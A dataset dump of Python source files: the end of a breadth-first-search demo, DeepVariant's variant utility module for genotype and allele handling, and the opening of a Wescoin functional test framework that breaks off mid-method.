         'L': set(['H', 'K'])}
def bfs(graph, start):
    """Breadth-first traversal of `graph` from `start`.

    Prints the set of reachable vertices (preserving the original script's
    behaviour) and additionally returns it so callers can use the result.

    Args:
        graph: mapping of vertex -> set of neighbouring vertices.
        start: the vertex to begin the traversal from.

    Returns:
        The set of vertices reachable from `start` (including `start`).
    """
    from collections import deque  # O(1) popleft vs list.pop(0)'s O(n)

    visited = set()
    queue = deque([start])
    while queue:
        vertex = queue.popleft()
        if vertex not in visited:
            visited.add(vertex)
            # Only enqueue neighbours not yet visited.
            queue.extend(graph[vertex] - visited)
    print(visited)
    return visited
# Demo: print the vertices reachable from 'A' in the sample graph.
bfs(graph, 'A')
def bfs_paths(graph, start, goal):
    """Yields every cycle-free path from `start` to `goal`, shortest first.

    Args:
        graph: mapping of vertex -> set of neighbouring vertices.
        start: the path origin vertex.
        goal: the path destination vertex.

    Yields:
        Lists of vertices, each a simple path from start to goal.
    """
    from collections import deque  # O(1) popleft vs list.pop(0)'s O(n)

    queue = deque([(start, [start])])
    while queue:
        vertex, path = queue.popleft()
        # Excluding vertices already on the path avoids cycles. `neighbor`
        # replaces the original's loop variable `next`, which shadowed the
        # builtin of the same name.
        for neighbor in graph[vertex] - set(path):
            if neighbor == goal:
                yield path + [neighbor]
            else:
                queue.append((neighbor, path + [neighbor]))
# Demo: print every simple path from 'A' to 'L' in the sample graph.
print(list(bfs_paths(graph, 'A', 'L')))
| 24.044444 | 49 | 0.414972 |
acf692d4d51e38c953826cad821035467d715ecb | 26,321 | py | Python | deepvariant/core/variantutils.py | rose-brain/deepvariant | 59687bab3a93ba0674cc21edf71caf336b01f138 | [
"BSD-3-Clause"
] | 1 | 2019-05-09T21:56:48.000Z | 2019-05-09T21:56:48.000Z | deepvariant/core/variantutils.py | rose-brain/deepvariant | 59687bab3a93ba0674cc21edf71caf336b01f138 | [
"BSD-3-Clause"
] | null | null | null | deepvariant/core/variantutils.py | rose-brain/deepvariant | 59687bab3a93ba0674cc21edf71caf336b01f138 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2017 Google Inc.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Variant utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import enum
from deepvariant.core.genomics import struct_pb2
from deepvariant.core.genomics import variants_pb2
from deepvariant.core import ranges
# The alternate allele string a record uses when there is no alternate
# allele at all (i.e. a pure reference site).
NO_ALT_ALLELE = '.'
# The symbolic alternate allele gVCF reference blocks use to stand for
# "any" alternate allele.
GVCF_ALT_ALLELE = '<*>'
def set_variantcall_gq(variant_call, gq):
  """Sets the genotype quality (GQ) info field of variant_call to gq.

  Any existing GQ values are removed first, so afterwards the field holds
  exactly one number.

  Args:
    variant_call: third_party.nucleus.protos.VariantCall, modified in place.
    gq: numeric genotype quality to store.
  """
  if 'GQ' in variant_call.info:
    del variant_call.info['GQ']
  variant_call.info['GQ'].values.extend([struct_pb2.Value(number_value=gq)])
def decode_variants(encoded_iter):
  """Lazily parses serialized Variant protos from encoded_iter.

  Args:
    encoded_iter: An iterable that produces binary encoded
      third_party.nucleus.protos.Variant strings.

  Yields:
    A parsed third_party.nucleus.protos.Variant for each encoded element
    of encoded_iter, in order.
  """
  for encoded_variant in encoded_iter:
    yield variants_pb2.Variant.FromString(encoded_variant)
def variant_position(variant):
  """Returns a new Range at the start position of variant.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    A new Range with the same reference_name as variant and start but an end
    that is start + 1. This produces a range that is the single basepair of the
    start of variant, hence the name position. Note that variant.start is
    zero-based, so the range covers exactly one base.
  """
  return ranges.make_range(variant.reference_name, variant.start,
                           variant.start + 1)
def variant_range(variant):
  """Returns a new Range covering variant.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    A new Range with the same reference_name, start, and end as variant,
    i.e. spanning the interval the variant proto itself reports.
  """
  return ranges.make_range(variant.reference_name, variant.start, variant.end)
def variant_range_tuple(variant):
  """Returns a (reference_name, start, end) tuple for the variant.

  A common use is sorting variants by chromosomal location, e.g.
  `sorted(variants, key=variant_range_tuple)`.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    A three-tuple with the same reference_name, start, and end as variant.
  """
  return variant.reference_name, variant.start, variant.end
@enum.unique
class GenotypeType(enum.Enum):
  """An enumeration of the types of genotypes.

  Each member carries a human-readable name, an example diploid genotype
  (allele indices as they appear in VariantCall.genotype), and a stable
  integer class id.
  """
  hom_ref = ('homozygous reference', [0, 0], 0)
  het = ('heterozygous', [0, 1], 1)
  hom_var = ('homozygous non-reference', [1, 1], 2)
  no_call = ('no call', [-1, -1], -1)

  def __init__(self, full_name, example_gt, class_id):
    self.full_name = full_name
    self.example_gt = example_gt
    self.class_id = class_id
@enum.unique
class VariantType(enum.Enum):
  """An enumeration of the types of variants."""
  # A variant.proto where there is no alt allele.
  ref = 0
  # A non-reference variant.proto where all ref and alt alleles
  # are single basepairs.
  snp = 1
  # A non-reference variant.proto where at least one of ref or alt alleles
  # are longer than 1 bp.
  indel = 2
def format_filters(variant):
  """Returns a human-readable rendering of the variant's filter field.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    The filter values joined by commas, or '.' when no filters are set.
  """
  if not variant.filter:
    return '.'
  return ','.join(variant.filter)
def format_alleles(variant):
  """Returns 'ref/alt1,alt2,...' for the variant's alleles.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    A string: the reference bases, a '/', then the comma-joined alts.
  """
  joined_alts = ','.join(variant.alternate_bases)
  return variant.reference_bases + '/' + joined_alts
def format_position(variant):
  """Returns the variant's position as 'reference_name:position'.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    A string 'chrom:start + 1' (start is zero-based, display is one-based).
  """
  return '%s:%d' % (variant.reference_name, variant.start + 1)
def is_snp(variant):
  """Is variant a SNP?

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    True iff variant is a non-reference site where the ref allele and every
    alt allele (of which there is at least one) are exactly 1 bp long.
  """
  if is_ref(variant):
    return False
  if len(variant.reference_bases) != 1 or not variant.alternate_bases:
    return False
  return all(len(alt) == 1 for alt in variant.alternate_bases)
def is_indel(variant):
  """Is variant an indel?

  An indel event is simply one where at least one allele is longer than a
  single basepair.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    True if the alleles in variant indicate an insertion/deletion event
    occurs at this site.
  """
  if is_ref(variant):
    return False
  if len(variant.reference_bases) > 1:
    return True
  return any(len(alt) > 1 for alt in variant.alternate_bases)
def is_biallelic(variant):
  """Returns whether the variant carries a single alternate allele."""
  alt_count = len(variant.alternate_bases)
  return alt_count == 1
def is_multiallelic(variant):
  """Does variant have multiple alt alleles?

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    True when two or more alternate alleles are present.
  """
  return len(variant.alternate_bases) >= 2
def is_ref(variant):
  """Returns true if variant is a reference record.

  Variant protos can encode sites that aren't actually mutations in the
  sample: either no alternate alleles at all, or a single '.' (the VCF
  missing value) as the only alt.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    A boolean.
  """
  alts = list(variant.alternate_bases)
  return alts == [] or alts == ['.']
def variant_type(variant):
  """Gets the VariantType of variant.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    VariantType indicating the type of this variant: ref for reference
    records, snp for single-basepair substitutions, indel otherwise.
  """
  if is_ref(variant):
    return VariantType.ref
  return VariantType.snp if is_snp(variant) else VariantType.indel
def is_transition(allele1, allele2):
  """Is the pair of single-bp alleles a transition (A<->G or C<->T)?

  Args:
    allele1: A string of the first allele, must be 1 bp in length.
    allele2: A string of the second allele, must be 1 bp in length.

  Returns:
    True if allele1/allele2 are a transition SNP, False for transversions.

  Raises:
    ValueError: if allele1 and allele2 are equal or aren't 1 bp in length.
  """
  if allele1 == allele2:
    raise ValueError('Alleles must be unique:', allele1, allele2)
  for allele in (allele1, allele2):
    if len(allele) != 1:
      raise ValueError('Alleles must be 1 bp in length.', allele)
  pair = {allele1, allele2}
  return pair == {'A', 'G'} or pair == {'C', 'T'}
def is_insertion(ref, alt):
  """Is alt an insertion w.r.t. ref?

  Args:
    ref: A string of the reference allele.
    alt: A string of the alternative allele.

  Returns:
    True if alt is longer than ref, i.e. encodes an insertion.
  """
  return len(alt) > len(ref)
def is_deletion(ref, alt):
  """Is alt a deletion w.r.t. ref?

  Args:
    ref: A string of the reference allele.
    alt: A string of the alternative allele.

  Returns:
    True if alt is shorter than ref, i.e. encodes a deletion.
  """
  return len(alt) < len(ref)
def has_insertion(variant):
  """Does variant have at least one insertion allele?

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    True if the alleles in variant indicate an insertion event occurs at
    this site.
  """
  ref = variant.reference_bases
  if not is_indel(variant):
    return False
  return any(is_insertion(ref, alt) for alt in variant.alternate_bases)
def has_deletion(variant):
  """Does variant have at least one deletion allele?

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    True if the alleles in variant indicate a deletion event occurs at
    this site.
  """
  ref = variant.reference_bases
  if not is_indel(variant):
    return False
  return any(is_deletion(ref, alt) for alt in variant.alternate_bases)
@enum.unique
class AlleleMismatchType(enum.Enum):
  """An enumeration of the types of allele mismatches we detect."""
  # Duplicate alleles within a single variant's alt list.
  duplicate_eval_alleles = 1
  duplicate_true_alleles = 2
  # Truth has an allele that doesn't match any allele in eval.
  unmatched_true_alleles = 3
  # Eval has an allele that doesn't match any allele in truth.
  unmatched_eval_alleles = 4
def allele_mismatches(evalv, truev):
  """Determines the set of allele mismatch discordances between evalv and truev.

  Compares the alleles present in evalv and truev to determine if there are any
  disagreements between the set of called alleles in the two Variant protos. The
  type of differences basically boil down to:

  -- Are there duplicate alt alleles?
  -- Can we find a matching allele in the truev for each allele in evalv, and
     vice versa?

  Two alleles A and B match when they would produce the same sequence of bases
  in ref and alt haplotypes starting at the same position. So CA=>TA is the same
  as C=>T (position is the same, replacing A by A is a noop) but AC=>AT isn't
  the same as C=>T because the former event changes bases 1 bp further along in
  the reference genome than the C=>T allele.

  Args:
    evalv: A third_party.nucleus.protos.Variant.
    truev: A third_party.nucleus.protos.Variant.

  Returns:
    A set of AlleleMismatchType values.
  """
  unmatched_eval_alleles = []
  # Using set() removes duplicate alleles in truth and eval variants.
  # allele_matches maps each unique truth alt to the eval alts it matched.
  allele_matches = {alt: [] for alt in set(truev.alternate_bases)}
  for eval_alt in set(evalv.alternate_bases):
    # Loop over each possible alt allele, adding eval_alt to each matching alt
    # allele. Alleles "match" when their simplified (common-postfix-stripped)
    # ref/alt pairs are identical.
    found_match = False
    for true_alt in allele_matches:
      if (simplify_alleles(evalv.reference_bases, eval_alt) == simplify_alleles(
          truev.reference_bases, true_alt)):
        # We are a match to true_alt, so record that fact in allele_matches
        allele_matches[true_alt].append(eval_alt)
        found_match = True
    if not found_match:
      # We never found a match for eval_alt.
      unmatched_eval_alleles.append(eval_alt)

  # At this point we've checked every alt against every eval allele, and are
  # ready to summarize the differences using our AlleleMismatchType enum.
  types = set()
  if len(set(evalv.alternate_bases)) != len(evalv.alternate_bases):
    types.add(AlleleMismatchType.duplicate_eval_alleles)
  if len(set(truev.alternate_bases)) != len(truev.alternate_bases):
    types.add(AlleleMismatchType.duplicate_true_alleles)
  if unmatched_eval_alleles:
    types.add(AlleleMismatchType.unmatched_eval_alleles)
  # A truth alt matched by zero or multiple eval alts is also a mismatch.
  # NOTE: .itervalues() is Python 2-only.
  if any(len(match) != 1 for match in allele_matches.itervalues()):
    types.add(AlleleMismatchType.unmatched_true_alleles)
  return types
def simplify_alleles(*alleles):
  """Simplifies alleles by stripping off common postfix bases.

  For example, simplify("AC", "GC") produces ("A", "G") because "C" is a
  common postfix, while simplify("AC", "GT") returns its inputs unchanged.

  No allele is ever reduced to the empty string: for ['CACA', 'CA'] the
  longest common postfix is 'CA', but the result is ('CAC', 'C') so every
  output allele keeps at least one base.

  Args:
    *alleles: A tuple of bases, each as a string, to simplify.

  Returns:
    A tuple, one entry per input allele in order, with any common postfix
    bases stripped off.
  """
  # Never strip more than (shortest length - 1) bases, so each result
  # keeps at least one base.
  max_strip = min(len(allele) for allele in alleles) - 1
  strip = 0
  while strip < max_strip:
    trailing = {allele[-(strip + 1)] for allele in alleles}
    if len(trailing) != 1:
      break
    strip += 1
  if strip == 0:
    # Fast path: nothing shared, return the inputs as-is.
    return alleles
  return tuple(allele[:-strip] for allele in alleles)
def is_filtered(variant):
  """Returns True if variant has a non-PASS filter field, or False otherwise.

  'PASS' and the missing value '.' do not count as filtering.
  """
  for filter_value in variant.filter:
    if filter_value != 'PASS' and filter_value != '.':
      return True
  return False
def is_variant_call(variant,
                    require_non_ref_genotype=True,
                    no_calls_are_variant=False):
  """Is variant a non-reference call?

  A Variant proto doesn't always imply that there's a variant present in the
  genome. The call may not have alternate bases, may be filtered, may have a
  hom-ref genotype, etc. This function looks for all of those configurations
  and returns true iff the variant is asserting that a mutation is present
  in the sample.

  Note that this code allows a variant without a calls field to be variant,
  but one with a genotype call must have a non-reference genotype to be
  considered variant (if require_non_ref_genotype is True, the default). If
  False, a variant that passes all of the site-level requirements for being
  a variant_call will return a True value, regardless of the genotypes, which
  means that we'll consider a site with a sample with a hom-ref or no-call site
  a variant call.

  Args:
    variant: third_party.nucleus.protos.Variant.
    require_non_ref_genotype: Should we require a site with a genotype call to
      have a non-reference (het, hom-var) genotype for the site to be considered
      a variant call?
    no_calls_are_variant: If a site has genotypes, should we consider no_call
      genotypes as being variant or not?

  Returns:
    True if variant is really a mutation call.

  Raises:
    ValueError: If variant has more than one call (i.e., is multi-sample).
  """
  if not variant.alternate_bases:
    return False
  elif is_filtered(variant):
    return False
  elif not variant.calls or not require_non_ref_genotype:
    return True
  # All tests after this point should only look at genotype-based fields, as
  # we may have aborted out in the prev. line due to require_non_ref_genotype.
  elif len(variant.calls) > 1:
    raise ValueError('Unsupported: multiple genotypes found at', variant)
  elif any(g > 0 for g in variant.calls[0].genotype):
    # Any genotype index > 0 refers to an alt allele, so this is a real call.
    return True
  elif no_calls_are_variant:
    # -1 encodes a no-call genotype index.
    return all(g == -1 for g in variant.calls[0].genotype)
  else:
    return False
def has_genotypes(variant):
  """Does variant have genotype calls?

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    True if variant has at least one entry in its calls field.
  """
  # Coerce to a plain bool rather than leaking the container's truthiness.
  return bool(len(variant.calls))
def genotype_type(variant):
  """Gets the GenotypeType for variant.

  If variant doesn't have genotypes, returns no_call. Otherwise returns one
  of no_call, hom_ref, het, or hom_var depending on the genotypes in the
  single call field of variant.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    A GenotypeType.

  Raises:
    ValueError: If variant has more than one call (i.e., is multi-sample).
  """
  if not has_genotypes(variant):
    return GenotypeType.no_call
  if len(variant.calls) > 1:
    raise ValueError('Unsupported: multiple genotypes found at', variant)
  unique_alleles = set(variant.calls[0].genotype)
  if unique_alleles == {-1}:
    return GenotypeType.no_call
  if unique_alleles == {0}:
    return GenotypeType.hom_ref
  if len(unique_alleles) > 1:
    return GenotypeType.het
  return GenotypeType.hom_var
def genotype_as_alleles(variant):
  """Gets the sample's genotype as a list of actual allele strings.

  For example, with reference_bases = 'A', alternate_bases = ['C'] and
  genotype indices [0, 1], this returns ['A', 'C'].

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    A list of allele strings from variant, one per genotype index in
    variant.calls[0], in order.

  Raises:
    ValueError: If variant doesn't have genotypes.
    ValueError: If variant has more than one call (i.e., is multi-sample).
  """
  if not has_genotypes(variant):
    raise ValueError('Not genotypes present in', variant)
  if len(variant.calls) > 1:
    raise ValueError('Unsupported: multiple genotypes found at', variant)
  # Genotype indices use -1 for no-call, 0 for the reference allele, and
  # values > 0 for alt alleles, so offsetting each index by one turns it
  # into a direct lookup in this allele table.
  lookup = ['.', variant.reference_bases] + list(variant.alternate_bases)
  return [lookup[index + 1] for index in variant.calls[0].genotype]
def genotype_quality(variant, default=None):
  """Gets the genotype quality (GQ) of the genotype call in variant.

  Falls back to `default` when `variant` has no genotypes, or when the call
  record carries no 'GQ' entry in its info map.

  Args:
    variant: third_party.nucleus.protos.Variant.
    default: Value to return when GQ is unavailable.

  Returns:
    The GQ value (or `default`, whatever type that is).
  """
  if not has_genotypes(variant):
    return default
  call_info = variant.calls[0].info
  if 'GQ' not in call_info:
    return default
  return call_info['GQ'].values[0].number_value
def is_gvcf(variant):
  """Returns True if variant encodes a standard gVCF reference block.

  In practice this means the variant carries exactly one alternate allele,
  and that allele is the canonical gVCF marker GVCF_ALT_ALLELE.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Returns:
    Boolean. True if variant is a gVCF record, False otherwise.
  """
  alts = list(variant.alternate_bases)
  return len(alts) == 1 and alts[0] == GVCF_ALT_ALLELE
def _genotype_order_in_likelihoods(num_alts, ploidy=2):
"""Yields tuples of `ploidy` ints for the given number of alt alleles.
https://samtools.github.io/hts-specs/VCFv4.1.pdf
"If A is the allele in REF and B,C,... are the alleles as ordered in ALT,
the ordering of genotypes for the likelihoods is given by:
F(j/k) = (k*(k+1)/2)+j. In other words, for biallelic sites the ordering is:
AA,AB,BB; for triallelic sites the ordering is: AA,AB,BB,AC,BC,CC, etc."
The biallelic sites in our case are 0/0, 0/1, 1/1.
The triallelic sites are 0/0, 0/1, 1/1, 0/2, 1/2, 2/2.
This wiki page has more information that generalizes to different ploidy.
http://genome.sph.umich.edu/wiki/Relationship_between_Ploidy,_Alleles_and_Genotypes
Args:
num_alts: int. The number of alternate alleles at the site.
ploidy: int. The ploidy for which to return genotypes.
Yields:
Tuples of `ploidy` ints representing allele indices in the order they appear
in the corresponding genotype likelihood array.
"""
if ploidy == 1:
for i in range(num_alts + 1):
yield (i,)
elif ploidy == 2:
for j in range(num_alts + 1):
for i in range(j + 1):
yield (i, j)
else:
raise NotImplementedError('Only haploid and diploid supported.')
def genotype_ordering_in_likelihoods(variant):
  """Yields (i, j, allele_i, allele_j) for the genotype ordering in GLs.

  Follows the VCF 4.1 genotype-likelihood ordering (see
  https://samtools.github.io/hts-specs/VCFv4.1.pdf): for biallelic sites
  0/0, 0/1, 1/1; for triallelic sites 0/0, 0/1, 1/1, 0/2, 1/2, 2/2; etc.
  Only the diploid case is implemented.

  Args:
    variant: third_party.nucleus.protos.Variant.

  Yields:
    Allele indices and strings (i, j, allele_i, allele_j) in GL order.
  """
  alleles = [variant.reference_bases] + list(variant.alternate_bases)
  num_alts = len(variant.alternate_bases)
  for low, high in _genotype_order_in_likelihoods(num_alts, ploidy=2):
    yield low, high, alleles[low], alleles[high]
def genotype_likelihood_index(allele_indices):
  """Returns the genotype likelihood index for the given allele indices.

  Args:
    allele_indices: list(int). Allele indices of one genotype, e.g. diploid
      homozygous reference is [0, 0].

  Returns:
    The index into the associated genotype likelihood array for this
    genotype, following the VCF ordering F(j/k) = k*(k+1)/2 + j.

  Raises:
    NotImplementedError: The allele_indices are more than diploid.
  """
  ploidy = len(allele_indices)
  if ploidy == 1:
    # Haploid: the GL array is indexed directly by the allele.
    return allele_indices[0]
  if ploidy == 2:
    low, high = sorted(allele_indices)
    return high * (high + 1) // 2 + low
  raise NotImplementedError(
      'Genotype likelihood index only supports haploid and diploid: {}'.
      format(allele_indices))
def allele_indices_for_genotype_likelihood_index(gl_index, ploidy=2):
  """Returns the allele indices corresponding to the given GL index.

  This is the inverse function to `genotype_likelihood_index`.

  Args:
    gl_index: int. The index within a genotype likelihood array for which to
      determine the associated alleles.
    ploidy: int. The ploidy of the result.

  Returns:
    For diploid, a tuple of 2 allele indices. NOTE(review): for haploid the
    bare int `gl_index` is returned rather than a 1-tuple — kept for
    backward compatibility with existing callers.

  Raises:
    NotImplementedError: The requested allele indices are more than diploid.
  """
  if ploidy == 1:
    return gl_index
  if ploidy == 2:
    # TODO: use the closed-form inverse described at
    # https://genome.sph.umich.edu/wiki/Relationship_between_Ploidy,_Alleles_and_Genotypes
    # rather than creating all genotypes explicitly.
    # Find the smallest alt count whose GL array is long enough to contain
    # gl_index, then enumerate genotypes in GL order and pick the one asked.
    alt_count = 1
    while genotype_likelihood_index([alt_count, alt_count]) < gl_index:
      alt_count += 1
    ordered_genotypes = list(
        _genotype_order_in_likelihoods(alt_count, ploidy=ploidy))
    return ordered_genotypes[gl_index]
  raise NotImplementedError(
      'Allele calculations only supported for haploid and diploid.')
def genotype_likelihood(variantcall, allele_indices):
  """Returns the genotype likelihood for the given allele indices.

  Args:
    variantcall: third_party.nucleus.protos.VariantCall. The VariantCall from
      which to extract the genotype likelihood of the allele indices.
    allele_indices: list(int). Allele indices of one genotype, e.g. diploid
      heterozygous alternate can be represented as [0, 1].

  Returns:
    The float genotype likelihood of this set of alleles.
  """
  gl_position = genotype_likelihood_index(allele_indices)
  return variantcall.genotype_likelihood[gl_position]
def allele_indices_with_num_alts(variant, num_alts, ploidy=2):
  """Returns allele indices configurations with `num_alts` alternates.

  Args:
    variant: third_party.nucleus.protos.Variant. Defines the candidate
      alternate alleles used to build the configurations.
    num_alts: int in [0, `ploidy`]. Number of non-reference alleles each
      returned configuration must contain.
    ploidy: int. The ploidy for which to return allele indices
      configurations.

  Returns:
    A list of tuples, each of length `ploidy`, covering every diploid
    genotype that contains exactly `num_alts` non-reference alleles.

  Raises:
    ValueError: The domain of `num_alts` is invalid.
    NotImplementedError: `ploidy` is not diploid.
  """
  if ploidy != 2:
    raise NotImplementedError(
        'allele_indices_with_num_alts only supports diploid.')
  if not 0 <= num_alts <= ploidy:
    raise ValueError(
        'Invalid number of alternate alleles requested: {} for ploidy {}'.
        format(num_alts, ploidy))
  num_candidates = len(variant.alternate_bases)
  if num_alts == 0:
    # Only homozygous reference qualifies.
    return [(0, 0)]
  if num_alts == 1:
    # Reference paired with each candidate alt in turn.
    return [(0, alt) for alt in range(1, num_candidates + 1)]
  # Both alleles non-reference: every unordered pair of alts (incl. equal).
  return [(first, second)
          for first in range(1, num_candidates + 1)
          for second in range(first, num_candidates + 1)]
| 33.025094 | 90 | 0.71859 |
acf693c35d3ebf7426916e46aa993fb01a7122c7 | 22,830 | py | Python | test/functional/test_framework/test_framework.py | ahamium/WESCOIN | a15d64caa24dec050f997fe2031d518ee1d76836 | [
"MIT"
] | null | null | null | test/functional/test_framework/test_framework.py | ahamium/WESCOIN | a15d64caa24dec050f997fe2031d518ee1d76836 | [
"MIT"
] | null | null | null | test/functional/test_framework/test_framework.py | ahamium/WESCOIN | a15d64caa24dec050f997fe2031d518ee1d76836 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Base class for RPC testing."""
import configparser
from enum import Enum
import logging
import argparse
import os
import pdb
import shutil
import sys
import tempfile
import time
from .authproxy import JSONRPCException
from . import coverage
from .test_node import TestNode
from .mininode import NetworkThread
from .util import (
MAX_NODES,
PortSeed,
assert_equal,
check_json_precision,
connect_nodes_bi,
disconnect_nodes,
get_datadir_path,
initialize_datadir,
p2p_port,
set_node_times,
sync_blocks,
sync_mempools,
)
class TestStatus(Enum):
    # Outcome of a functional-test run; translated to a process exit code
    # via the TEST_EXIT_* module constants when main() finishes.
    PASSED = 1
    FAILED = 2
    SKIPPED = 3
# Process exit codes reported to the test runner. 77 is the automake
# convention for a skipped test.
TEST_EXIT_PASSED = 0
TEST_EXIT_FAILED = 1
TEST_EXIT_SKIPPED = 77
class SkipTest(Exception):
    """This exception is raised to skip a test"""

    def __init__(self, message):
        # Human-readable reason for the skip; logged by main() when caught.
        self.message = message
class WescoinTestMetaClass(type):
    """Metaclass for WescoinTestFramework.

    Ensures that any attempt to register a subclass of `WescoinTestFramework`
    adheres to a standard whereby the subclass overrides `set_test_params` and
    `run_test` but DOES NOT override either `__init__` or `main`. If any of
    those standards are violated, a ``TypeError`` is raised."""

    def __new__(cls, clsname, bases, dct):
        # The base framework class itself is exempt from the checks.
        if clsname != 'WescoinTestFramework':
            defines_required = 'run_test' in dct and 'set_test_params' in dct
            if not defines_required:
                raise TypeError("WescoinTestFramework subclasses must override "
                                "'run_test' and 'set_test_params'")
            touches_reserved = '__init__' in dct or 'main' in dct
            if touches_reserved:
                raise TypeError("WescoinTestFramework subclasses may not override "
                                "'__init__' or 'main'")
        return super().__new__(cls, clsname, bases, dct)
class WescoinTestFramework(metaclass=WescoinTestMetaClass):
    """Base class for a wescoin test script.

    Individual wescoin test scripts should subclass this class and override the
    set_test_params() and run_test() methods.

    Individual tests can also override the following methods to customize the
    test setup:

    - add_options()
    - setup_chain()
    - setup_network()
    - setup_nodes()

    The __init__() and main() methods should not be overridden.

    This class also contains various public and private helper methods."""

    def __init__(self):
        """Sets test framework defaults. Do not override this method. Instead, override the set_test_params() method"""
        self.setup_clean_chain = False
        self.nodes = []
        self.network_thread = None
        # mocktime of 0 means "use real time" (see enable_mocktime below).
        self.mocktime = 0
        self.rpc_timewait = 60  # Wait for up to 60 seconds for the RPC server to respond
        self.supports_cli = False
        self.bind_to_localhost_only = True
        # Subclass hook (enforced by the metaclass) that must set num_nodes.
        self.set_test_params()
        assert hasattr(self, "num_nodes"), "Test must set self.num_nodes in set_test_params()"

    def main(self):
        """Main function. This should not be overridden by the subclass test scripts."""
        # --- Command-line parsing ---
        parser = argparse.ArgumentParser(usage="%(prog)s [options]")
        parser.add_argument("--nocleanup", dest="nocleanup", default=False, action="store_true",
                            help="Leave wescoinds and test.* datadir on exit or error")
        parser.add_argument("--noshutdown", dest="noshutdown", default=False, action="store_true",
                            help="Don't stop wescoinds after the test execution")
        parser.add_argument("--cachedir", dest="cachedir", default=os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../cache"),
                            help="Directory for caching pregenerated datadirs (default: %(default)s)")
        parser.add_argument("--tmpdir", dest="tmpdir", help="Root directory for datadirs")
        parser.add_argument("-l", "--loglevel", dest="loglevel", default="INFO",
                            help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console. Note that logs at all levels are always written to the test_framework.log file in the temporary test directory.")
        parser.add_argument("--tracerpc", dest="trace_rpc", default=False, action="store_true",
                            help="Print out all RPC calls as they are made")
        parser.add_argument("--portseed", dest="port_seed", default=os.getpid(), type=int,
                            help="The seed to use for assigning port numbers (default: current process id)")
        parser.add_argument("--coveragedir", dest="coveragedir",
                            help="Write tested RPC commands into this directory")
        parser.add_argument("--configfile", dest="configfile",
                            default=os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../config.ini"),
                            help="Location of the test framework config file (default: %(default)s)")
        parser.add_argument("--pdbonfailure", dest="pdbonfailure", default=False, action="store_true",
                            help="Attach a python debugger if test fails")
        parser.add_argument("--usecli", dest="usecli", default=False, action="store_true",
                            help="use wescoin-cli instead of RPC for all commands")
        # Let the subclass add its own options before parsing.
        self.add_options(parser)
        self.options = parser.parse_args()

        # Seed port assignment so parallel test runs don't collide.
        PortSeed.n = self.options.port_seed

        check_json_precision()

        self.options.cachedir = os.path.abspath(self.options.cachedir)

        # --- Locate the binaries built by the project (env vars override) ---
        config = configparser.ConfigParser()
        config.read_file(open(self.options.configfile))
        self.options.wescoind = os.getenv("WESCOIND", default=config["environment"]["BUILDDIR"] + '/src/wescoind' + config["environment"]["EXEEXT"])
        self.options.wescoincli = os.getenv("WESCOINCLI", default=config["environment"]["BUILDDIR"] + '/src/wescoin-cli' + config["environment"]["EXEEXT"])

        os.environ['PATH'] = os.pathsep.join([
            os.path.join(config['environment']['BUILDDIR'], 'src'),
            os.path.join(config['environment']['BUILDDIR'], 'src', 'qt'),
            os.environ['PATH']
        ])

        # Set up temp directory and start logging
        if self.options.tmpdir:
            self.options.tmpdir = os.path.abspath(self.options.tmpdir)
            # exist_ok=False: fail loudly rather than reuse a stale datadir.
            os.makedirs(self.options.tmpdir, exist_ok=False)
        else:
            self.options.tmpdir = tempfile.mkdtemp(prefix="test")
        self._start_logging()

        self.log.debug('Setting up network thread')
        self.network_thread = NetworkThread()
        self.network_thread.start()

        # --- Run the test; any exception maps to a failure/skip status ---
        success = TestStatus.FAILED

        try:
